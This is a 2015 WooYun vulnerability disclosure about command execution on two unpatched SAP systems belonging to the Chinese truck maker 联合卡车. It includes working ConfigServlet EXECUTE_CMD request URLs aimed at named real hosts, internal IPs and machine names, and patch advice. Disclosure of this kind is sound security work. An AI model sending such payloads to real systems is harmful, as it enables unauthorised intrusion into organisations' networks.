当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0147191

漏洞标题:联合卡车两处SAP系统命令执行

相关厂商:联合卡车

漏洞作者: 0xafei

提交时间:2015-10-17 17:50

修复时间:2015-12-01 17:50

公开时间:2015-12-01 17:50

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-17: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-12-01: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

集瑞联合重工有限公司,简称联合卡车(http://www.ctruck.com.cn/)集团两处SAP系统未及时打补丁,导致命令执行。涉及重要业务,并且可影响同网段其他业务系统。

详细说明:

http://scm.ctruck.com.cn:50000//ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cmd.exe /c ipconfig /all


http://58.243.186.29:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cmd.exe /c ipconfig /all


exp说明一切
同网段还有mail服务器

漏洞证明:

一开始我以为是同一处,后来发现是两个不同系统
第一处:scm.ctruck.com.cn 是DMS经销商管理系统

ping scm.ctruck.com.cn
正在 Ping scm.nslb.ctruck.com.cn [220.180.137.117] 具有 32 字节的数据:
来自 220.180.137.117 的回复: 字节=32 时间=44ms TTL=128
来自 220.180.137.117 的回复: 字节=32 时间=36ms TTL=128
来自 220.180.137.117 的回复: 字节=32 时间=37ms TTL=128
来自 220.180.137.117 的回复: 字节=32 时间=52ms TTL=128


第二处是:58.243.186.29
不能直接证明属于联合卡车。但是根据内网数据可以推断出来。
-------
scm.ctruck.com.cn内网ip为 10.100.8.115,机器名为:portalprd
58.243.186.29 内网ip为10.100.8.116 机器名为:ccsrv009
上几张截图:

net_view_c.png


查看用户

netuser_c.png


修复方案:

其他同类漏洞说打以下两个补丁
SAP 1467771
SAP 1445998

版权声明:转载请注明来源 0xafei@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)


漏洞评价:

评论